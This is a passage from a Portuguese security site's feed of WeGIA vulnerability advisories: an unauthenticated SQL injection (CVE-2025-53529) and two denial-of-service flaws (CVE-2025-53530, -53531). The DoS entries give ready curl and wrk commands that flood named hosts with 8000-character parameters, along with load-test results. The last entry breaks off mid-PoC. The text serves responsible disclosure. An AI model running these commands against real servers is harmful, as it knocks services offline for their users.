&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;html/funcionario/profile_funcionario.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;html/funcionario/profile_funcionario.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Navegue até: &amp;lt;a href=&amp;#34;https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1&amp;lt;/a&amp;gt;;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Insira o comando SQL após o parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; como na imagem abaixo:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53529/image.png&amp;#34;
	width=&amp;#34;1912&amp;#34;
	height=&amp;#34;1073&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53529/image_hu_32a2f42d1fd543dd.png 480w, /p/cve-2025-53529/image_hu_e2f18ef0e93db18f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;178&amp;#34;
		data-flex-basis=&amp;#34;427px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe a mensagem de erro fatal: &amp;lt;code&amp;gt;Uncaught PDOException: SQLSTATE[HY000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns&amp;lt;/code&amp;gt;, confirmando inequivocamente a injeção de SQL.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/pedro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&amp;amp;amp;utm_campaign=share_via&amp;amp;amp;utm_content=profile&amp;amp;amp;utm_medium=android_app&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Pedro Lyrio&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53530</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53530/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53530/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53530-consumo-descontrolado-de-recursos-no-parâmetro-wegia-errorstr&amp;#34;&amp;gt;CVE-2025-53530: Consumo descontrolado de recursos no parâmetro WeGIA &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O servidor WeGia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt;. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53530-consumo-descontrolado-de-recursos-no-parâmetro-wegia-errorstr&amp;#34;&amp;gt;CVE-2025-53530: Consumo descontrolado de recursos no parâmetro WeGIA &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53530&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O servidor WeGia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt;. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;GET https://comfirewall.wegia.org:8000/WeGIA?errorstr=AAAA...&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;O parâmetro &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt; na URL permite que invasores adicionem uma quantidade arbitrária de dados de até &amp;lt;b&amp;gt;8.142 caracteres.&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Não há validação para o comprimento do parâmetro &amp;lt;code&amp;gt;errorstr&amp;lt;/code&amp;gt; processado pelo servidor.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Durante os testes, o parâmetro foi estendido com caracteres repetidos (&amp;lt;code&amp;gt;errorstr=&amp;lt;value&amp;gt;&amp;lt;/code&amp;gt;), causando exaustão de recursos, timeouts e erros em conexões de soquete.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Etapas para reproduzir o problema:
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Execute a seguinte solicitação HTTP GET para reproduzir o problema:&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  curl &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c &amp;amp;#39;print(&amp;amp;#34;A&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Para simular um ataque de alta carga, use a ferramenta &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt;:&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  wrk -t12 -c400 -d60s &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c &amp;amp;#39;print(&amp;amp;#34;A&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;video width=&amp;#34;100%&amp;#34; height=&amp;#34;100%&amp;#34; controls&amp;gt;
  &amp;lt;source src=&amp;#34;404392693-694ff24a-243a-429e-8225-b9de406355fc.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Resultados de Testes Atualizados com &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt;:&amp;lt;/b&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;20.180 solicitações&amp;lt;/b&amp;gt; foram processadas em 1 minuto.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;719 timeouts&amp;lt;/b&amp;gt; e &amp;lt;b&amp;gt;134 erros de leitura&amp;lt;/b&amp;gt; ocorreram, indicando que o servidor teve dificuldades para responder à carga.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;A latência média foi de &amp;lt;b&amp;gt;249,77 ms&amp;lt;/b&amp;gt;, com picos atingindo &amp;lt;b&amp;gt;2 segundos&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;O servidor tentou lidar com a carga, mas demonstrou exaustão significativa de recursos, confirmando sua vulnerabilidade a ataques DoS.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta é uma vulnerabilidade de Negação de Serviço. Qualquer usuário não autenticado com acesso a ferramentas como o OWASP ZAP pode explorar esse problema para deixar o servidor sem resposta. Isso afeta a disponibilidade do aplicativo e pode interromper as operações comerciais. A ausência de limitação de taxa e restrições de rastreamento recursivo aumenta o risco e torna a vulnerabilidade explorável por invasores pouco qualificados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela0x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53531</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53531/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53531/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53531-consumo-descontrolado-de-recursos-no-parâmetro-fid-do-wegia&amp;#34;&amp;gt;CVE-2025-53531: Consumo descontrolado de recursos no parâmetro &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt; do WeGIA
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O servidor Wegia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt;. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53531-consumo-descontrolado-de-recursos-no-parâmetro-fid-do-wegia&amp;#34;&amp;gt;CVE-2025-53531: Consumo descontrolado de recursos no parâmetro &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt; do WeGIA
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53531&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O servidor Wegia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro &amp;lt;code&amp;gt;fid&amp;lt;/code&amp;gt;. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET https://comfirewall.wegia.org:8000/WeGIA?fid=111251&amp;amp;amp;file_url=111256&amp;amp;amp;param1=AAAA&amp;amp;amp;param2=BBBB&amp;amp;amp;param3=CCCC...&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;A URL aceita parâmetros concatenados com &amp;lt;code&amp;gt;&amp;amp;&amp;lt;/code&amp;gt;, permitindo que invasores adicionem uma quantidade arbitrária de dados de até &amp;lt;b&amp;gt;8.142 caracteres.&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Não há validação para o comprimento total da URL ou o número de parâmetros processados ​​pelo servidor.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Durante o teste, a URL foi estendida com parâmetros repetidos (&amp;lt;code&amp;gt;&amp;amp;param=-value-&amp;lt;/code&amp;gt;), causando exaustão de recursos e instabilidade do servidor.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Etapas para reproduzir o problema:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Execute a seguinte solicitação HTTP GET para reproduzir o problema:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  curl &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?fid=111251&amp;amp;amp;file_url=111256$(python3 -c &amp;amp;#39;print(&amp;amp;#34;&amp;amp;amp;param=&amp;amp;#34; &#43; &amp;amp;#34;X&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Para simular um ataque de alta carga, use a ferramenta &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt;:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
